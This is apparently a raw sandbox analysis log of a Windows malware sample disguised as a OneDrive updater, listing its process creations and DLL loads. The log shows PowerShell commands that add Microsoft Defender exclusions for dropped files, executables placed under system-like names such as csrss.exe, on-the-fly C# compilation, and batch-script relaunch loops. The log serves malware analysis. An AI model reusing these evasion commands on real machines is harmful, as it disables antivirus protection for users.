Source: C:\Users\Public\Documents\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\GogtzRNUlL.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f4wp5ulp\f4wp5ulp.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3caoicbj\3caoicbj.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Documents\csrss.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\MjlsqDcSPlv.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\MjlsqDcSPlv.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\MjlsqDcSPlv.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe'	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hHF9v8Y4oh.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES197D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4C6AACF3DD740FF943F213646D3DC0.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1C5B.tmp" "c:\Windows\System32\CSC4209A55E9E1C448293632CEEB8D0515F.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe "C:\Program Files\Microsoft Office 15\ClientX64\MjlsqDcSPlv.exe"
Source: C:\Users\Public\Documents\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\4wM4wqHWVF.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\csrss.exe "C:\Users\All Users\Documents\csrss.exe"
Source: C:\Users\Public\Documents\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\MYvr7swJ3g.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\csrss.exe "C:\Users\All Users\Documents\csrss.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\HSh65PBXsw.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe "C:\Users\user\NetHood\MjlsqDcSPlv.exe"
Source: C:\Users\Public\Documents\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\MCv5EqkMBH.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\csrss.exe "C:\Users\All Users\Documents\csrss.exe"
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\T7zpOYzElC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\VzpByHn75i.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Users\Public\Documents\csrss.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\GogtzRNUlL.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
